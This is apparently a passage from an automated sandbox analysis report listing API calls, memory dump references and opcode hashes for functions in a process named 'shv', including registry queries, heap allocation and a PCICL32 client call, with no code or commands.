                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 4250438611-0
                                                                                        • Opcode ID: 67d0535f9917eda0a66b98e87cebc8e18bfd1550bcaf1cebbbb9a70a7bd862fa
                                                                                        • Instruction ID: 0abc4f845f824d36ed78952968282f56f0fdb4b6e73539f4192c6b0462dbd307
                                                                                        • Opcode Fuzzy Hash: 67d0535f9917eda0a66b98e87cebc8e18bfd1550bcaf1cebbbb9a70a7bd862fa
                                                                                        • Instruction Fuzzy Hash: 1FF0827260420DCFDF54EFB5D65872AB3B1EB6231DF12006EC51296594CBF86880DB82
                                                                                        APIs
                                                                                        • WSACancelBlockingCall.WSOCK32 ref: 6D1C63A9
                                                                                        • Sleep.KERNEL32(00000032), ref: 6D1C63B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: BlockingCallCancelSleep
                                                                                        • String ID:
                                                                                        • API String ID: 3706969569-0
                                                                                        • Opcode ID: a78e0ebd2e21b0b6b15878bfe2d6be3d21108b9b62dea694f5035bc569092ea6
                                                                                        • Instruction ID: 29ed3d0e612924bdcfd900e5597778fd01387730c6428399cd2f7b0deeda7e32
                                                                                        • Opcode Fuzzy Hash: a78e0ebd2e21b0b6b15878bfe2d6be3d21108b9b62dea694f5035bc569092ea6
                                                                                        • Instruction Fuzzy Hash: 5AB0926029521549EB0017720A0A33A20990FE628BF525464AB5AC849DEFE8C140A0A2
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76938400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                        • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,6D1E6F16,00000000,?,6D1ED40B,00000001,6D1E6F16,00000000,00000000,00000000,?,6D1E6F16,00000001,00000214), ref: 6D1EA0C5
                                                                                          • Part of subcall function 6D1E60F9: __getptd_noexit.LIBCMT ref: 6D1E60F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 328603210-0
                                                                                        • Opcode ID: d251bd1d6fe16649234cc37b882a0f385d5cc895ea6703bac402ee7f8f5d836d
                                                                                        • Instruction ID: 4a2cbaf451d3fc17a60077e9f90feb62d2d2e19fff547daed9750e1f99a1b2c0
                                                                                        • Opcode Fuzzy Hash: d251bd1d6fe16649234cc37b882a0f385d5cc895ea6703bac402ee7f8f5d836d
                                                                                        • Instruction Fuzzy Hash: 6101B131305A179EEB158FA5CC54F6737B8AB927E4F014529E926CB188DBF5A440C690
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                          • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 328603210-0
                                                                                        • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                        • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                        APIs
                                                                                        • __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • Part of subcall function 1116364B: strtoxl.LIBCMT ref: 1116366C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __wcstoi64strtoxl
                                                                                        • String ID:
                                                                                        • API String ID: 910016052-0
                                                                                        • Opcode ID: d261918410b5f9a7b38597d7a13bdfb59ca036f11ad90983dad614380adff32c
                                                                                        • Instruction ID: 254cfc0c4d222f30174c23c79f68bb227ffa76286089f7af02d48a6939310364
                                                                                        • Opcode Fuzzy Hash: d261918410b5f9a7b38597d7a13bdfb59ca036f11ad90983dad614380adff32c
                                                                                        • Instruction Fuzzy Hash: 10014F35A00109ABC700DEA8D945FAFB7B8DF98709F104059ED05AB280D671BE14C7B1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __waccess_s
                                                                                        • String ID:
                                                                                        • API String ID: 4272103461-0
                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3646066109-0
                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                        APIs
                                                                                        • _NSMClient32@8.PCICL32(?,?,?,00AB10A2,00000000), ref: 00AB100B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3993626943.0000000000AB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AB0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3993579084.0000000000AB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_ab0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Client32@8
                                                                                        • String ID:
                                                                                        • API String ID: 433899448-0
                                                                                        • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction ID: a294f78159dc7447ec9662f46ba14642bb0997d36ab7ce3af6c3385538507bdb
                                                                                        • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction Fuzzy Hash: 01B092B212438D9B8714EE98E951CBB339CAA98600B400809BD0543282CA61FC60A671